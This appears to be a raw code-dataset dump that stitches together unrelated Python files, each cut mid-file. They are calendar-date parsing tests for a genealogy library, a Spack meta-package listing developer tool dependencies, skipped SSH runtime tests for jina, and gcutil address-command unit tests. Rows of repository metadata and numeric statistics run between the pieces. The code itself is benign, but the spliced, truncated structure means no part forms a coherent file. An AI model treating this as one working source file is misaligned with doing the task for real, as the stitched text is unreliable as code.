self.assertEqual(date.calendar, CalendarType.GREGORIAN)
date = GregorianDate(1699, "FEB", dual_year=1700)
self.assertEqual(date.year, 1699)
self.assertEqual(date.dual_year, 1700)
self.assertFalse(date.bc)
self.assertEqual(date.year_str, "1699/00")
self.assertEqual(date.month, "FEB")
self.assertEqual(date.month_num, 2)
self.assertIsNone(date.day)
self.assertEqual(date.calendar, CalendarType.GREGORIAN)
date = HebrewDate(5000)
self.assertEqual(date.year, 5000)
self.assertFalse(date.bc)
self.assertEqual(date.year_str, "5000")
self.assertIsNone(date.month)
self.assertIsNone(date.month_num)
self.assertIsNone(date.day)
self.assertEqual(date.calendar, CalendarType.HEBREW)
date = FrenchDate(1, "FRUC", 1)
self.assertEqual(date.year, 1)
self.assertFalse(date.bc)
self.assertEqual(date.year_str, "1")
self.assertEqual(date.month, "FRUC")
self.assertEqual(date.month_num, 12)
self.assertEqual(date.day, 1)
self.assertEqual(date.calendar, CalendarType.FRENCH_R)
date = JulianDate(5, "JAN", bc=True)
self.assertEqual(date.year, 5)
self.assertTrue(date.bc)
self.assertEqual(date.year_str, "5 B.C.")
self.assertEqual(date.month, "JAN")
self.assertEqual(date.month_num, 1)
self.assertIsNone(date.day)
self.assertEqual(date.calendar, CalendarType.JULIAN)
def test_002_cal_date_key(self):
"""Test date.CalendarDate class."""
date = GregorianDate(2017, "OCT", 9)
self.assertEqual(date.key(), (2458035.5, 0))
date = GregorianDate(1699, "FEB", 1, dual_year=1700)
self.assertEqual(date.key(), (2342003.5, 0))
date = FrenchDate(2017, "VENT", bc=True)
self.assertEqual(date.key(), (1638959.5, 1))
date = HebrewDate(2017, "TSH", 22)
self.assertEqual(date.key(), (1084542.5, 0))
date = JulianDate(1000)
self.assertEqual(date.key(), (2086672.5, 1))
def test_003_cal_date_cmp(self):
"""Test date.CalendarDate class."""
self.assertTrue(GregorianDate(2016, "JAN", 1) < GregorianDate(2017, "JAN", 1))
self.assertTrue(GregorianDate(2017, "JAN", 1) < GregorianDate(2017, "FEB", 1))
self.assertTrue(GregorianDate(2017, "JAN", 1) < GregorianDate(2017, "JAN", 2))
self.assertTrue(GregorianDate(2017, "JAN", 1) <= GregorianDate(2017, "JAN", 2))
self.assertTrue(GregorianDate(2017, "JAN", 2) > GregorianDate(2017, "JAN", 1))
self.assertTrue(GregorianDate(2017, "JAN", 2) >= GregorianDate(2017, "JAN", 1))
self.assertTrue(GregorianDate(2017, "JAN", 1) == GregorianDate(2017, "JAN", 1))
self.assertTrue(GregorianDate(2017, "JAN", 1) != GregorianDate(2017, "JAN", 2))
# missing day compares as "past" the last day of month, but before next month
self.assertTrue(GregorianDate(2017, "JAN") > GregorianDate(2017, "JAN", 31))
self.assertTrue(GregorianDate(2017, "JAN") < GregorianDate(2017, "FEB", 1))
# missing month compares as "past" the last day of year, but before next year
self.assertTrue(GregorianDate(2017) > GregorianDate(2017, "DEC", 31))
self.assertTrue(GregorianDate(2017) < GregorianDate(2018, "JAN", 1))
# dual date
self.assertTrue(GregorianDate(1700, "JAN", 1) == GregorianDate(1699, "JAN", 1, dual_year=1700))
# compare Gregorian and Julian dates
self.assertTrue(GregorianDate(1582, "OCT", 15) == JulianDate(1582, "OCT", 5))
self.assertTrue(GregorianDate(1582, "OCT", 16) > JulianDate(1582, "OCT", 5))
self.assertTrue(JulianDate(1582, "OCT", 6) > GregorianDate(1582, "OCT", 15))
self.assertTrue(GregorianDate(2000, "JAN", 14) == JulianDate(2000, "JAN", 1))
# compare Gregorian and French dates
self.assertTrue(GregorianDate(1792, "SEP", 22) == FrenchDate(1, "VEND", 1))
self.assertTrue(GregorianDate(1792, "SEP", 23) > FrenchDate(1, "VEND", 1))
self.assertTrue(FrenchDate(1, "VEND", 2) > GregorianDate(1792, "SEP", 22))
self.assertTrue(GregorianDate(2020, "SEP", 21) == FrenchDate(228, "COMP", 5))
# compare Gregorian and Hebrew dates
self.assertTrue(GregorianDate(2020, "JAN", 1) == HebrewDate(5780, "SVN", 4))
def test_004_cal_date_str(self):
"""Test date.CalendarDate class."""
date = GregorianDate(2017, "OCT", 9)
self.assertEqual(str(date), "9 OCT 2017")
date = GregorianDate(2017, "OCT", bc=True)
self.assertEqual(str(date), "OCT 2017 B.C.")
date = GregorianDate(1699, "JAN", 1, dual_year=1700)
self.assertEqual(str(date), "1 JAN 1699/00")
date = HebrewDate(5000)
self.assertEqual(str(date), "@#DHEBREW@ 5000")
date = FrenchDate(1, "VEND", 1)
self.assertEqual(str(date), "@#DFRENCH R@ 1 VEND 1")
date = JulianDate(1582, "OCT", 5)
self.assertEqual(str(date), "@#DJULIAN@ 5 OCT 1582")
def test_005_cal_date_parse(self):
"""Test date.CalendarDate.parse method."""
date = CalendarDate.parse("31 MAY 2020")
self.assertIsInstance(date, GregorianDate)
self.assertEqual(date.year, 2020)
self.assertIsNone(date.dual_year)
self.assertFalse(date.bc)
self.assertEqual(date.month, "MAY")
self.assertEqual(date.month_num, 5)
self.assertEqual(date.day, 31)
self.assertEqual(date.original, "31 MAY 2020")
self.assertEqual(date.calendar, CalendarType.GREGORIAN)
date = CalendarDate.parse("@#DGREGORIAN@ 10 MAR 1698/99")
self.assertIsInstance(date, GregorianDate)
self.assertEqual(date.year, 1698)
self.assertEqual(date.dual_year, 1699)
self.assertFalse(date.bc)
self.assertEqual(date.month, "MAR")
self.assertEqual(date.month_num, 3)
self.assertEqual(date.day, 10)
self.assertEqual(date.original, "@#DGREGORIAN@ 10 MAR 1698/99")
self.assertEqual(date.calendar, CalendarType.GREGORIAN)
date = CalendarDate.parse("10 MAR 1699/00")
self.assertIsInstance(date, GregorianDate)
self.assertEqual(date.year, 1699)
self.assertEqual(date.dual_year, 1700)
self.assertEqual(date.original, "10 MAR 1699/00")
self.assertEqual(date.calendar, CalendarType.GREGORIAN)
date = CalendarDate.parse("@#DJULIAN@ 100 B.C.")
self.assertIsInstance(date, JulianDate)
self.assertEqual(date.year, 100)
self.assertTrue(date.bc)
self.assertIsNone(date.month)
self.assertIsNone(date.month_num)
self.assertIsNone(date.day)
self.assertEqual(date.original, "@#DJULIAN@ 100 B.C.")
self.assertEqual(date.calendar, CalendarType.JULIAN)
date = CalendarDate.parse("@#DFRENCH R@ 15 GERM 0001")
self.assertIsInstance(date, FrenchDate)
self.assertEqual(date.year, 1)
self.assertFalse(date.bc)
self.assertEqual(date.month, "GERM")
self.assertEqual(date.month_num, 7)
self.assertEqual(date.day, 15)
self.assertEqual(date.original, "@#DFRENCH R@ 15 GERM 0001")
self.assertEqual(date.calendar, CalendarType.FRENCH_R)
date = CalendarDate.parse("@#DHEBREW@ 7 NSN 5000")
self.assertIsInstance(date, HebrewDate)
self.assertEqual(date.year, 5000)
self.assertFalse(date.bc)
self.assertEqual(date.month, "NSN")
self.assertEqual(date.month_num, 8)
self.assertEqual(date.day, 7)
self.assertEqual(date.original, "@#DHEBREW@ 7 NSN 5000")
self.assertEqual(date.calendar, CalendarType.HEBREW)
# cannot handle ROMAN
with self.assertRaises(ValueError):
date = CalendarDate.parse("@#DROMAN@ 2020")
# cannot handle UNKNOWN
with self.assertRaises(ValueError):
date = CalendarDate.parse("@#DUNKNOWN@ 2020")
# dual year only works for GREGORIAN
with self.assertRaises(ValueError):
date = CalendarDate.parse("@#DJULIAN@ 2020/21")
# cannot parse nonsense
with self.assertRaises(ValueError):
date = CalendarDate.parse("start of time")
def test_006_cal_date_visitor(self):
"""Test date.CalendarDate.accept method."""
visitor = TestDateVisitor()
date = GregorianDate(2017, "OCT", 9)
value = date.accept(visitor)
self.assertEqual(value, ("gregorian", date))
date = HebrewDate(5000)
value = date.accept(visitor)
self.assertEqual(value, ("hebrew", date))
date = FrenchDate(1, "VEND", 1)
value = date.accept(visitor)
self.assertEqual(value, ("french", date))
date = JulianDate(1582, "OCT", 5)
value = date.accept(visitor)
self.assertEqual(value, ("julian", date))
def test_007_cal_date_hash(self):
"""Test date.CalendarDate hash."""
self.assertEqual(hash(GregorianDate(2017, "OCT", 9)),
hash(GregorianDate(2017, "OCT", 9)))
self.assertEqual(hash(GregorianDate(2017, "OCT", 9, bc=True)),
hash(GregorianDate(2017, "OCT", 9, bc=True)))
self.assertEqual(hash(FrenchDate(1, "VEND", 1)),
hash(FrenchDate(1, "VEND", 1)))
self.assertEqual(hash(FrenchDate(1)),
hash(FrenchDate(1)))
def test_010_date_no_date(self):
"""Test date.DateValue class."""
date = DateValue.parse("not a date")
self.assertIsInstance(date, DateValuePhrase)
self.assertEqual(date.kind, DateValueTypes.PHRASE)
self.assertEqual(date.phrase, "not a date")
self.assertEqual(str(date), "(not a date)")
def test_012_date_parse_period(self):
"""Test date.DateValue class."""
date = DateValue.parse("FROM 1967")
self.assertIsInstance(date, DateValueFrom)
self.assertEqual(date.kind, DateValueTypes.FROM)
self.assertEqual(date.date, GregorianDate(1967))
self.assertEqual(str(date), "FROM 1967")
date = DateValue.parse("TO 1 JAN 2017")
self.assertIsInstance(date, DateValueTo)
self.assertEqual(date.kind, DateValueTypes.TO)
self.assertEqual(date.date, GregorianDate(2017, "JAN", 1))
self.assertEqual(str(date), "TO 1 JAN 2017")
date = DateValue.parse("FROM 1920 TO 2000")
self.assertIsInstance(date, DateValuePeriod)
self.assertEqual(date.kind, DateValueTypes.PERIOD)
self.assertEqual(date.date1, GregorianDate(1920))
self.assertEqual(date.date2, GregorianDate(2000))
self.assertEqual(str(date), "FROM 1920 TO 2000")
date = DateValue.parse("from mar 1920 to 1 apr 2000")
self.assertIsInstance(date, DateValuePeriod)
self.assertEqual(date.kind, DateValueTypes.PERIOD)
self.assertEqual(date.date1, GregorianDate(1920, "MAR"))
self.assertEqual(date.date2, GregorianDate(2000, "APR", 1))
self.assertEqual(str(date), "FROM MAR 1920 TO 1 APR 2000")
def test_013_date_parse_range(self):
"""Test date.DateValue class."""
date = DateValue.parse("BEF 1967B.C.")
self.assertIsInstance(date, DateValueBefore)
self.assertEqual(date.kind, DateValueTypes.BEFORE)
self.assertEqual(date.date, GregorianDate(1967, bc=True))
self.assertEqual(str(date), "BEFORE 1967 B.C.")
date = DateValue.parse("AFT 1 JAN 2017")
self.assertIsInstance(date, DateValueAfter)
self.assertEqual(date.kind, DateValueTypes.AFTER)
self.assertEqual(date.date, GregorianDate(2017, "JAN", 1))
self.assertEqual(str(date), "AFTER 1 JAN 2017")
date = DateValue.parse("BET @#DJULIAN@ 1600 AND 2000")
self.assertIsInstance(date, DateValueRange)
self.assertEqual(date.kind, DateValueTypes.RANGE)
self.assertEqual(date.date1, JulianDate(1600))
self.assertEqual(date.date2, GregorianDate(2000))
self.assertEqual(str(date), "BETWEEN @#DJULIAN@ 1600 AND 2000")
date = DateValue.parse("bet mar 1920 and apr 2000")
self.assertIsInstance(date, DateValueRange)
self.assertEqual(date.kind, DateValueTypes.RANGE)
self.assertEqual(date.date1, GregorianDate(1920, "MAR"))
self.assertEqual(date.date2, GregorianDate(2000, "APR"))
self.assertEqual(str(date), "BETWEEN MAR 1920 AND APR 2000")
def test_014_date_parse_approx(self):
"""Test date.DateValue class."""
dates = {"500 B.C.": GregorianDate(500, bc=True),
"JAN 2017": GregorianDate(2017, "JAN"),
"31 JAN 2017": GregorianDate(2017, "JAN", 31)}
approx = [
("ABT", "ABOUT", DateValueAbout, DateValueTypes.ABOUT),
("CAL", "CALCULATED", DateValueCalculated, DateValueTypes.CALCULATED),
("EST", "ESTIMATED", DateValueEstimated, DateValueTypes.ESTIMATED)
]
for appr, fmt, klass, typeEnum in approx:
for datestr, value in dates.items():
date = DateValue.parse(appr + " " + datestr)
self.assertIsInstance(date, klass)
self.assertEqual(date.kind, typeEnum)
self.assertEqual(str(date), fmt + " " + datestr)
self.assertEqual(date.date, value)
def test_015_date_parse_phrase(self):
"""Test date.DateValue class."""
date = DateValue.parse("(some phrase)")
self.assertIsInstance(date, DateValuePhrase)
self.assertEqual(date.kind, DateValueTypes.PHRASE)
self.assertEqual(date.phrase, "some phrase")
date = DateValue.parse("INT 1967 B.C. (some phrase)")
self.assertIsInstance(date, DateValueInterpreted)
self.assertEqual(date.kind, DateValueTypes.INTERPRETED)
self.assertEqual(date.date, GregorianDate(1967, bc=True))
self.assertEqual(date.phrase, "some phrase")
self.assertEqual(str(date), "INTERPRETED 1967 B.C. (some phrase)")
date = DateValue.parse("INT @#DGREGORIAN@ 1 JAN 2017 (some phrase)")
self.assertIsInstance(date, DateValueInterpreted)
self.assertEqual(date.kind, DateValueTypes.INTERPRETED)
self.assertEqual(date.date, GregorianDate(2017, "JAN", 1))
self.assertEqual(date.phrase, "some phrase")
self.assertEqual(str(date), "INTERPRETED 1 JAN 2017 (some phrase)")
def test_016_date_parse_simple(self):
"""Test date.DateValue class."""
date = DateValue.parse("1967 B.C.")
self.assertIsInstance(date, DateValueSimple)
self.assertEqual(date.kind, DateValueTypes.SIMPLE)
self.assertEqual(date.date, GregorianDate(1967, bc=True))
self.assertEqual(str(date), "1967 B.C.")
date = DateValue.parse("@#DGREGORIAN@ 1 JAN 2017")
self.assertIsInstance(date, DateValueSimple)
self.assertEqual(date.kind, DateValueTypes.SIMPLE)
self.assertEqual(date.date, GregorianDate(2017, "JAN", 1))
self.assertEqual(str(date), "1 JAN 2017")
def test_017_date_cmp(self):
"""Test date.Date class."""
dv = DateValue.parse("2016")
self.assertIsInstance(dv.key(), tuple)
self.assertEqual(dv.key(), (GregorianDate(2016), GregorianDate(2016)))
dv = DateValue.parse("31 DEC 2000")
self.assertIsInstance(dv.key(), tuple)
self.assertEqual(dv.key(), (GregorianDate(2000, "DEC", 31), GregorianDate(2000, "DEC", 31)))
dv = DateValue.parse("BET 31 DEC 2000 AND 1 JAN 2001")
self.assertIsInstance(dv.key(), tuple)
self.assertEqual(dv.key(), (GregorianDate(2000, "DEC", 31), GregorianDate(2001, "JAN", 1)))
# order of dates is messed up
dv = DateValue.parse("BET 31 DEC 2000 AND 1 JAN 2000")
self.assertIsInstance(dv.key(), tuple)
self.assertEqual(dv.key(), (GregorianDate(2000, "DEC", 31), GregorianDate(2000, "JAN", 1)))
self.assertTrue(DateValue.parse("2016") < DateValue.parse("2017"))
self.assertTrue(DateValue.parse("2 JAN 2016") > DateValue.parse("1 JAN 2016"))
self.assertTrue(DateValue.parse("BET 1900 AND 2000") < DateValue.parse("FROM 1920 TO 1999"))
# comparing simple date with range
self.assertTrue(DateValue.parse("1 JAN 2000") > DateValue.parse("BET 1 JAN 1999 AND 1 JAN 2000"))
self.assertNotEqual(DateValue.parse("1 JAN 2000"), DateValue.parse("BET 1 JAN 2000 AND 1 JAN 2001"))
self.assertTrue(DateValue.parse("1 JAN 2000") < DateValue.parse("BET 1 JAN 2000 AND 1 JAN 2001"))
self.assertTrue(DateValue.parse("1 JAN 2000") > DateValue.parse("BEF 1 JAN 2000"))
self.assertTrue(DateValue.parse("1 JAN 2000") > DateValue.parse("TO 1 JAN 2000"))
self.assertTrue(DateValue.parse("1 JAN 2000") < DateValue.parse("AFT 1 JAN 2000"))
self.assertTrue(DateValue.parse("1 JAN 2000") < DateValue.parse("FROM 1 JAN 2000"))
# comparing ranges
self.assertEqual(DateValue.parse("FROM 1 JAN 2000 TO 1 JAN 2001"),
DateValue.parse("BET 1 JAN 2000 AND 1 JAN 2001"))
self.assertTrue(DateValue.parse("FROM 1 JAN 1999 TO 1 JAN 2001") <
DateValue.parse("BET 1 JAN 2000 AND 1 JAN 2001"))
self.assertTrue(DateValue.parse("FROM 1 JAN 2000 TO 1 JAN 2002") >
DateValue.parse("BET 1 JAN 2000 AND 1 JAN 2001"))
# Less specific date compares later than more specific
self.assertTrue(DateValue.parse("2000") > DateValue.parse("31 DEC 2000"))
self.assertTrue(DateValue.parse("DEC 2000") > DateValue.parse("31 DEC 2000"))
# phrase is always later than any regular date
self.assertTrue(DateValue.parse("(Could be 1996 or 1998)") > DateValue.parse("2000"))
# "empty" date is always later than any regular date
self.assertTrue(DateValue.parse("") > DateValue.parse("2000"))
def test_018_date_parse_empty(self):
"""Test date.DateValue class."""
for value in (None, ""):
date = DateValue.parse(value)
self.assertIsInstance(date, DateValuePhrase)
self.assertEqual(date.kind, DateValueTypes.PHRASE)
self.assertIsNone(date.phrase)
self.assertEqual(str(date), "")
def test_019_date_value_visitor(self):
"""Test date.DateValue class."""
visitor = TestDateVisitor()
date1 = GregorianDate(2017, "JAN", 1)
date2 = GregorianDate(2017, "DEC", 31)
value = DateValueSimple(date1).accept(visitor)
self.assertEqual(value, ("simple", date1))
value = DateValueFrom(date1).accept(visitor)
self.assertEqual(value, ("from", date1))
value = DateValueTo(date1).accept(visitor)
self.assertEqual(value, ("to", date1))
value = DateValuePeriod(date1, date2).accept(visitor)
self.assertEqual(value, ("period", date1, date2))
value = DateValueBefore(date1).accept(visitor)
self.assertEqual(value, ("before", date1))
value = DateValueAfter(date1).accept(visitor)
self.assertEqual(value, ("after", date1))
value = DateValueRange(date1, date2).accept(visitor)
self.assertEqual(value, ("range", date1, date2))
value = DateValueAbout(date1).accept(visitor)
self.assertEqual(value, ("about", date1))
value = DateValueCalculated(date1).accept(visitor)
self.assertEqual(value, ("calculated", date1))
value = DateValueEstimated(date1).accept(visitor)
self.assertEqual(value, ("estimated", date1))
value = DateValueInterpreted(date1, "phrase").accept(visitor)
self.assertEqual(value, ("interpreted", date1, "phrase"))
value = DateValuePhrase("phrase").accept(visitor)
self.assertEqual(value, ("phrase", "phrase"))
def test_020_date_hash(self):
"""Test date.Date hash"""
dv1 = DateValue.parse("2016")
dv2 = DateValue.parse("2016")
self.assertEqual(hash(dv1), hash(dv2))
dv1 = DateValue.parse("31 DEC 2000")
dv2 = DateValue.parse("31 DEC 2000")
self.assertEqual(hash(dv1), hash(dv2))
dv1 = DateValue.parse("BET 31 DEC 2000 AND 1 JAN 2001")
dv2 = DateValue.parse("BET 31 DEC 2000 AND 1 JAN 2001")
self.assertEqual(hash(dv1), hash(dv2))
| 41.356784 | 108 | 0.637708 | 2,825 | 24,690 | 5.540177 | 0.095221 | 0.147594 | 0.127468 | 0.029519 | 0.685515 | 0.588844 | 0.440419 | 0.387196 | 0.343684 | 0.308223 | 0 | 0.067049 | 0.22981 | 24,690 | 596 | 109 | 41.426175 | 0.755995 | 0.047833 | 0 | 0.314943 | 0 | 0 | 0.096256 | 0 | 0 | 0 | 0 | 0 | 0.565517 | 1 | 0.075862 | false | 0 | 0.006897 | 0 | 0.124138 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7ce4ea0979a0d8bcdfade749e59f8ad94da264f2
| 3,487 |
py
|
Python
|
var/spack/repos/builtin/packages/visionary-dev-tools/package.py
|
electronicvisions/spack
|
d6121eb35b4948f7d8aef7ec7a305a5123a7439e
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2 |
2019-02-10T13:47:48.000Z
|
2019-04-17T13:05:17.000Z
|
var/spack/repos/builtin/packages/visionary-dev-tools/package.py
|
einc-eu/spack
|
15468b92ed21d970c0111ae19144e85e66746433
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 8 |
2021-05-28T06:39:59.000Z
|
2022-03-30T15:12:35.000Z
|
var/spack/repos/builtin/packages/visionary-dev-tools/package.py
|
einc-eu/spack
|
15468b92ed21d970c0111ae19144e85e66746433
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2 |
2018-04-06T09:04:11.000Z
|
2020-01-24T12:52:12.000Z
|
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import os.path as osp
class VisionaryDevTools(Package):
"""Developer convenience packages common to all visionary
development meta packages. Application specific build tools belong
to the dedicated meta packages."""
homepage = ''
# some random tarball, to make `spack fetch --dependencies visionary-defaults` work
url = 'https://github.com/electronicvisions/spack/archive/v0.8.tar.gz'
# This is only a dummy tarball (see difference between version numbers)
# TODO: as soon as a MetaPackage-concept has been merged, please update this package
version('1.0', '372ce038842f20bf0ae02de50c26e85d', url='https://github.com/electronicvisions/spack/archive/v0.8.tar.gz')
depends_on('ack')
depends_on('autoconf')
depends_on('automake')
depends_on('bash-completion')
depends_on('bazel')
depends_on('bear')
depends_on('cairo +X')
depends_on('cloc')
depends_on('cmake')
depends_on('connect-proxy')
depends_on('cppcheck +htmlreport')
depends_on('cquery')
depends_on('doxygen+graphviz')
depends_on('emacs ~X')
depends_on('gdb')
depends_on('genpybind')
depends_on('git+tcltk')
depends_on('git-fat-git')
depends_on('gtkplus')
depends_on('imagemagick')
depends_on('jq')
depends_on('libpcap')
depends_on('libtool')
depends_on('llvm+visionary+python~libcxx build_type=Release')
depends_on('mercurial')
depends_on('mosh')
depends_on('munge')
depends_on('ncdu')
depends_on('node-js')
depends_on('octave+fftw')
depends_on('openssh')
depends_on('pigz')
depends_on('pkg-config')
depends_on('py-autopep8')
depends_on('py-black', when="^python@3.6.0:")
depends_on('py-configargparse')
depends_on('py-doxypypy')
depends_on('py-flake8')
depends_on('py-gdbgui')
depends_on('py-git-review')
depends_on('py-ipython')
depends_on('py-jedi')
depends_on('py-junit-xml')
depends_on('py-language-server')
depends_on('py-line-profiler')
depends_on('py-nose')
depends_on('py-nose2')
depends_on('py-memory-profiler')
depends_on('py-pudb')
depends_on('py-pylint@:1.999.999', when="^python@:2.999.999")
depends_on('py-pylint', when="^python@3.4.0:")
depends_on('py-pyserial')
depends_on('py-pytest')
depends_on('py-pytest-xdist')
depends_on('py-ranger-fm')
depends_on('py-sqlalchemy')
depends_on('py-virtualenv')
depends_on('py-xmlrunner')
depends_on('py-yq')
depends_on('rtags')
depends_on('tar')
depends_on('texinfo')
# ECM (2020-05-14): removed 'the-silver-searcher' due to build fail on gcc@10.1.0
depends_on('tig')
depends_on('time')
depends_on('tmux')
depends_on('units')
depends_on('valgrind')
depends_on('verilator')
depends_on('vim +python +ruby +perl +cscope +huge +x')
depends_on('visionary-xilinx')
depends_on('wget')
depends_on('yaml-cpp+shared')
depends_on('zsh')
def install(self, spec, prefix):
mkdirp(prefix.etc)
# store a copy of this package.
filename = osp.basename(osp.dirname(__file__)) # gives name of parent folder
install(__file__, join_path(prefix.etc, filename + '.py'))
# we could create some filesystem view here?
| 33.854369 | 124 | 0.677086 | 474 | 3,487 | 4.805907 | 0.478903 | 0.288411 | 0.125549 | 0.014925 | 0.04741 | 0.04741 | 0.04741 | 0.04741 | 0.04741 | 0.04741 | 0 | 0.024756 | 0.177516 | 3,487 | 102 | 125 | 34.186275 | 0.769526 | 0.217666 | 0 | 0 | 0 | 0 | 0.34507 | 0.022239 | 0 | 0 | 0 | 0.009804 | 0 | 1 | 0.012195 | false | 0 | 0.012195 | 0 | 0.060976 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7ceab378038506dba92e4b8d3ecd8a07fc74f4a2
| 1,469 |
py
|
Python
|
tests/unit/peapods/runtimes/remote/ssh/test_ssh_remote.py
|
yk/jina
|
ab66e233e74b956390f266881ff5dc4e0110d3ff
|
[
"Apache-2.0"
] | 1 |
2020-12-23T12:34:00.000Z
|
2020-12-23T12:34:00.000Z
|
tests/unit/peapods/runtimes/remote/ssh/test_ssh_remote.py
|
yk/jina
|
ab66e233e74b956390f266881ff5dc4e0110d3ff
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/peapods/runtimes/remote/ssh/test_ssh_remote.py
|
yk/jina
|
ab66e233e74b956390f266881ff5dc4e0110d3ff
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from jina.enums import RemoteAccessType
from jina.flow import Flow
from jina.parser import set_pea_parser, set_pod_parser
from jina.peapods.pods import BasePod
from jina.peapods.runtimes.remote.ssh import SSHRuntime
from jina.proto import jina_pb2
@pytest.mark.skip('works locally, but until I findout how to mock ssh, this has to be skipped')
def test_ssh_pea():
p = set_pea_parser().parse_args(['--host', 'pi@172.16.1.110', '--timeout', '5000'])
with SSHRuntime(p, kind='pea') as pp:
assert pp.status.envelope.status.code == jina_pb2.StatusProto.READY
assert pp.status is None
@pytest.mark.skip('works locally, but until I find out how to mock ssh, this has to be skipped')
def test_ssh_pod():
p = set_pod_parser().parse_args(['--host', 'pi@172.16.1.110', '--timeout', '5000'])
with SSHRuntime(p, kind='pod') as pp:
assert pp.status.envelope.status.code == jina_pb2.StatusProto.READY
assert pp.status is None
@pytest.mark.skip('not implemented yet')
def test_ssh_mutable_pod():
p = set_pod_parser().parse_args(['--host', 'pi@172.16.1.110', '--timeout', '5000'])
p = BasePod(p)
with SSHRuntime(p, kind='pod') as pp:
assert pp.status.envelope.status.code == jina_pb2.StatusProto.READY
assert pp.status is None
@pytest.mark.skip('not implemented yet')
def test_flow():
f = Flow().add().add(host='pi@172.16.1.110', remote_access=RemoteAccessType.SSH)
with f:
pass
| 32.644444 | 96 | 0.701157 | 235 | 1,469 | 4.27234 | 0.297872 | 0.047809 | 0.083665 | 0.043825 | 0.681275 | 0.681275 | 0.666335 | 0.666335 | 0.610558 | 0.610558 | 0 | 0.042037 | 0.157931 | 1,469 | 44 | 97 | 33.386364 | 0.769604 | 0 | 0 | 0.451613 | 0 | 0 | 0.21307 | 0 | 0 | 0 | 0 | 0 | 0.193548 | 1 | 0.129032 | false | 0.032258 | 0.225806 | 0 | 0.354839 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7cf38c52d649f28843e5da3730409c34a52dc82f
| 8,026 |
py
|
Python
|
platform/gcutil/lib/google_compute_engine/gcutil_lib/address_cmds_test.py
|
IsaacHuang/google-cloud-sdk
|
52afa5d1a75dff08f4f5380c5cccc015bf796ca5
|
[
"Apache-2.0"
] | null | null | null |
platform/gcutil/lib/google_compute_engine/gcutil_lib/address_cmds_test.py
|
IsaacHuang/google-cloud-sdk
|
52afa5d1a75dff08f4f5380c5cccc015bf796ca5
|
[
"Apache-2.0"
] | null | null | null |
platform/gcutil/lib/google_compute_engine/gcutil_lib/address_cmds_test.py
|
IsaacHuang/google-cloud-sdk
|
52afa5d1a75dff08f4f5380c5cccc015bf796ca5
|
[
"Apache-2.0"
] | 2 |
2020-07-25T05:03:06.000Z
|
2020-11-04T04:55:57.000Z
|
# Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for address collection commands."""
import path_initializer
path_initializer.InitSysPath()
import json
import unittest
import gflags as flags
from gcutil_lib import address_cmds
from gcutil_lib import gcutil_unittest
from gcutil_lib import mock_api
from gcutil_lib import mock_lists
FLAGS = flags.FLAGS
class AddressCmdsTest(gcutil_unittest.GcutilTestCase):
def setUp(self):
self.mock, self.api = mock_api.CreateApi(self.version)
def testReserveAddressPromptsForRegion(self):
expected_project = 'test_project'
expected_address = 'test_address'
expected_description = 'test address'
expected_region = 'test-region'
expected_source_address = '123.123.123.1'
set_flags = {
'project': expected_project,
'description': expected_description,
'source_address': expected_source_address,
}
command = self._CreateAndInitializeCommand(
address_cmds.ReserveAddress, 'reserveaddress', set_flags=set_flags)
mock_lists.GetSampleRegionListCall(
command, self.mock, num_responses=1, name=[expected_region])
call = self.mock.Respond('compute.addresses.insert', {})
command.Handle(expected_address)
request = call.GetRequest()
self.assertEqual('POST', request.method)
self.assertEqual(expected_project, request.parameters['project'])
self.assertEquals(expected_region, request.parameters['region'])
body = json.loads(request.body)
self.assertEqual(body['name'], expected_address)
self.assertEqual(body['description'], expected_description)
self.assertEquals(body['address'], expected_source_address)
def testReserveAddressGeneratesCorrectRequest(self):
expected_project = 'test_project'
expected_address = 'test_address'
expected_description = 'test address'
submitted_region = 'test-region'
expected_source_address = '123.123.123.1'
set_flags = {
'project': expected_project,
'description': expected_description,
'region': submitted_region,
'source_address': expected_source_address,
}
command = self._CreateAndInitializeCommand(
address_cmds.ReserveAddress, 'reserveaddress', set_flags=set_flags)
call = self.mock.Respond('compute.addresses.insert', {})
command.Handle(expected_address)
request = call.GetRequest()
self.assertEqual('POST', request.method)
self.assertEqual(expected_project, request.parameters['project'])
self.assertEquals(submitted_region, request.parameters['region'])
body = json.loads(request.body)
self.assertEqual(body['name'], expected_address)
self.assertEqual(body['description'], expected_description)
self.assertEquals(body['address'], expected_source_address)
def testGetAddressGeneratesCorrectRequest(self):
expected_project = 'test_project'
expected_address = 'test_address'
submitted_region = 'test-region'
set_flags = {
'project': expected_project,
'region': submitted_region,
}
command = self._CreateAndInitializeCommand(
address_cmds.GetAddress, 'getaddress', set_flags=set_flags)
call = self.mock.Respond('compute.addresses.get', {})
command.Handle(expected_address)
